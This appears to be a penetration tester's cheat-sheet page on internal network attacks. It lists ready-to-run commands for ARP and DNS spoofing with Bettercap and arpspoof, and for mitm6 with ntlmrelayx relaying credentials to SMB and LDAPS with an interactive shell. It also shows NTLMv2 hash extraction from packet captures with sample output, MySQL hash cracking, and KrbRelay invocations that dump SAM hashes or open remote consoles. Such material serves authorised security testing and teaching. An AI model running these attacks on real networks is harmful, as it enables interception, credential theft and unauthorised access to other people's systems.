Network Attacks

Network Recon

bash find_cidrs.sh eth0

Internal_Pentest/find_cidrs.sh at main · nullenc0de/Internal_PentestGitHub

Dismap

GitHub - zhzyker/dismap: Asset discovery and identification tools 快速识别 Web 指纹信息，定位资产类型。辅助红队快速定位目标资产信息，辅助蓝队发现疑似脆弱点GitHub

NetScan - From Windows Host

SoftPerfect Network Scanner : fast, flexible, advancedwww.softperfect.com

Bettercap

Sniffing

Wireshark or tcpdump - Credentials in clear text ?

tcpdump -i eth0 -w packets.pcap -s 0

Miscellaneous Techniques Interacting with Users

Extract NTLMv1, etc

python3 ./Pcredz -f ../NTLMv1.pcapng

Extract NTLMv2

GitHub - mlgualtieri/NTLMRawUnHide: NTLMRawUnhide.py is a Python3 script designed to parse network packet capture files and extract NTLMv2 hashes in a crackable format. The following binary network packet capture formats are supported: *.pcap *.pcapng *.cap *.etlGitHub

# ./NTLMRawUnHide.py -i ../NTLMv2.pcap
                                                              /%(
                               -= Find NTLMv2 =-          ,@@@@@@@@&
           /%&@@@@&,            -= hashes w/ =-          %@@@@@@@@@@@*
         (@@@@@@@@@@@(       -= NTLMRawUnHide.py =-    *@@@@@@@@@@@@@@@.
        &@@@@@@@@@@@@@@&.                             @@@@@@@@@@@@@@@@@@(
      ,@@@@@@@@@@@@@@@@@@@/                        .%@@@@@@@@@@@@@@@@@@@@@
     /@@@@@@@#&@&*.,/@@@@(.                            ,%@@@@&##(%@@@@@@@@@.
    (@@@@@@@(##(.         .#&@%%(                .&&@@&(            ,/@@@@@@#
   %@@@@@@&*/((.         #(                           ,(@&            ,%@@@@@@*
  @@@@@@@&,/(*                                           ,             .,&@@@@@#
 @@@@@@@/*//,                                                            .,,,**
   .,,  ...
                                    .#@@@@@@@(.
                                   /@@@@@@@@@@@&
                                   .@@@@@@@@@@@*
                                     .(&@@@%/.  ..
                               (@@&     %@@.   .@@@,
                          /@@#          @@@,         %@&
                               &@@&.    @@@/    @@@#
                          .    %@@@(   ,@@@#    @@@(     ,
                         *@@/         .@@@@@(          #@%
                          *@@%.      &@@@@@@@@,      /@@@.
                           .@@@@@@@@@@@&. .*@@@@@@@@@@@/.
                              .%@@@@%,        /%@@@&(.


<-SNIP->

Found NTLMSSP Message Type 1 : Negotiation

Found NTLMSSP Message Type 1 : Negotiation

Found NTLMSSP Message Type 2 : Challenge
    > Server Challenge       : 9859cf3a459c3365 

Found NTLMSSP Message Type 2 : Challenge
    > Server Challenge       : 9859cf3a459c3365 

Found NTLMSSP Message Type 3 : Authentication
    > Domain                 : DOMAIN 
    > Username               : username 
    > Workstation            : DESKTOP-XXXXXX 

NTLMv2 Hash recovered:
username::DOMAIN:9859cf3a459c3365:2b56<-SNIP->52c21:0101000000000000868e5cd5587fd<-SNIP->ec730634c50a001000000000000000000000000000000000000900260063006900660073002f003100390032002e003100360038002e00320038002e003100330036000000000000000000

NFS Data Extraction

GitHub - Rysess/NFSExtractor: Extract NFS files from wireshark capture (pcap)GitHub

Finding vulnerabilities - Above

GitHub - caster0x00/Above: Network Security SnifferGitHub

Above is an invisible network sniffer for finding vulnerabilities in network equipment. It is based entirely on network traffic analysis, so it does not make any noise in the air. He’s invisible.

Convert pcapng to pcap

tshark -F pcap -r NTLMv2.pcapng -w NTLMv2.pcap

Open outbound ports / Filtering

Web content filtering

For example, try to connect to 4chan or exploit-db with CLI but also with a browser

Living Off Trusted Sites

Try to access some of LOTS

LOTS Project - Living Off Trusted Siteslots-project.com

Port Filtering

Test for other ports: 22, 21, 23, etc.

Outgoing Port Testerportquiz.net

$ports = @(20, 21, 22, 23, 25, 53, 80, 110, 143, 443, 465, 587, 993, 995, 3306, 3389, 8080)

$hostname = "portquiz.net"

foreach ($port in $ports) {
    $result = Test-NetConnection -ComputerName $hostname -Port $port -InformationLevel Detailed
    if ($result.TcpTestSucceeded) {
        Write-Output "Port $port is open on $hostname"
    }
}

Protocol Filtering

For example, if port 22 is blocked, also test for protocol filtering: SSH on port 443 ?

Server side:

sudo nano /etc/ssh/sshd_config
# Add or change port
Port 443
# Restart SSH
sudo systemctl restart ssh
# or
sudo service ssh restart
# If nesserary open port 443
sudo ufw allow 443/tcp

Try to connect over port 443

ssh -p 443 username@server_ip

The Protocol Filter feature is used to block unwanted traffic from your network. The feature is commonly used to make sure employees, students or end users are using their Internet access for its intended productive use. The filter can block dozens of different protocols, including: peer-to-peer traffic (Source: ClearOS)

ARP - DNS Spoofing

Bettercap

Standalone version:

wget https://github.com/bettercap/bettercap/releases/download/v2.31.1/bettercap_linux_amd64_v2.31.1.zip

root@box:/tmp# apt install libpcap-dev
root@box:/tmp# apt install libusb-1.0-0
root@box:/tmp#apt install libnetfilter-queue1
root@box:/tmp#apt install iproute2

Bettercap Tutorial & Top Commands (2026 Update)StationX

# Host discovery
net.probe on
# See all host
net.show
# ARP spoof
set arp.spoof.targets 192.168.37.133
arp.spoof on
# Spoof the entire subnet /!\ not recommended
set arp.spoof targets
# By default only connections to and from the external network will be spoofed
# Spoof internal connection
set arp.spoof.internal
# Capture data
net.sniff on
# Save the captured packet to pcap
set net.sniff.output filename.pcap
# DNS spoofing
set dns.spoof.domains github.com
dns.spoof.on

Arpspoof

$ apt install dsniff
$ apt-get install tcpdump

$ arpspoof -i eth0 -t [IP1] [IP2]
$ arpspoof -i eth0 -t [IP2] [IP1]
$ tcpdump -i eth0 host [IP1] or host [IP2] -w capture.pcap

Eavesarp

Detect and exploit Stale Network Address Configurations (SNACs) via network traffic analysis and ARP poisoning techniques

GitHub - ImpostorKeanu/eavesarp-ngGitHub

LLMNR NBT-NS Poisoning

ADIDNS Spoofing

MITM6

GitHub - dirkjanm/mitm6: pwning IPv4 via IPv6GitHub

https://cheatsheet.haax.fr/windows-systems/exploitation/ipv6/cheatsheet.haax.fr

mitm6 -d lab.local
ntlmrelayx.py -wh 192.168.218.129 -t smb://192.168.218.128/ -i
# -wh: Server hosting WPAD file (Attacker’s IP)
# -t: Target (You cannot relay credentials to the same device that you’re spoofing)
# -i: open an interactive shell
ntlmrelayx.py -t ldaps://lab.local -wh attacker-wpad --delegate-access

ntlmrelayx.py -6 -wh 192.168.1.6 -tf target.txt -socks -debug -smb2support

MITM MySQL

Use CredSLayer to extract salts and password hash

Crackeando credenciales de MySql obtenidos por un MITM like a Sir!Follow The White Rabbit

$mysqlna$<Salt1><Salt2>*<password_hash>

hashcat -a 0 -m 11200 hash.mysql

MITM - ASReproast

Misconfiguration

MITM - Kerberoast

Kerberoast

No LDAP Signing - KrbRelayUp

No-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).

GitHub - Dec0ne/KrbRelayUp: KrbRelayUp - a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).GitHub

KrbRelay

r-tec Blog | Windows is and always will be a Potatolandwww.r-tec.net

GitHub - cube0x0/KrbRelay: Framework for Kerberos relayingGitHub

Cross-session attack:
- KrbRelay.exe -s <SESSION-ID> -clsid 354FF91B-5E49-4BDC-A8E6-1CB6C6877182 -ntlm
Read out local SAM database hashes:
- KrbRelay.exe -cslid F8842F8E-DAFE-4B37-9D38-4E0714A61149 -session <TARGET-SESSION-ID> -spn cifs/<TARGET-SYSTEM>.<DOMAIN> -secrets
Relaying Kerberos to SMB for remote access:
- KrbRelay.exe -cslid f8842f8e-dafe-4b37-9d38-4e0714a61149 -session <SESSION-ID> -spn cifs/<TARGET-SYSTEM>.<DOMAIN> -console

NTLM Relay

SMB (445, 139) / RPC AD CS

Kerberos Relay

Last updated 4 months ago

hashtagNetwork Recon

hashtagDismap

hashtagNetScan - From Windows Host

hashtagBettercap

hashtagSniffing

hashtagExtract NTLMv1, etc

hashtagExtract NTLMv2

hashtagNFS Data Extraction

hashtagFinding vulnerabilities - Above

hashtagConvert pcapng to pcap

hashtagOpen outbound ports / Filtering

hashtagWeb content filtering

hashtagLiving Off Trusted Sites

hashtagPort Filtering

hashtagProtocol Filtering

hashtagARP - DNS Spoofing

hashtagBettercap

hashtagArpspoof

hashtagEavesarp

hashtagLLMNR NBT-NS Poisoning

hashtagADIDNS Spoofing

hashtagMITM6

hashtagMITM MySQL

hashtagMITM - ASReproast

hashtagMITM - Kerberoast

hashtagNo LDAP Signing - KrbRelayUp

hashtagKrbRelay

hashtagNTLM Relay

hashtagKerberos Relay

hashtagOver HTTP

hashtagOver SMB

hashtagVia DHCPv6-DNS-Takeover

Network Recon

Dismap

NetScan - From Windows Host

Bettercap

Sniffing

Extract NTLMv1, etc

Extract NTLMv2

NFS Data Extraction

Finding vulnerabilities - Above

Convert pcapng to pcap

Open outbound ports / Filtering

Web content filtering

Living Off Trusted Sites

Port Filtering

Protocol Filtering

ARP - DNS Spoofing

Bettercap

Arpspoof

Eavesarp

LLMNR NBT-NS Poisoning

ADIDNS Spoofing

MITM6

MITM MySQL

MITM - ASReproast

MITM - Kerberoast

No LDAP Signing - KrbRelayUp

KrbRelay

NTLM Relay

Kerberos Relay

Over HTTP

Over SMB

Via DHCPv6-DNS-Takeover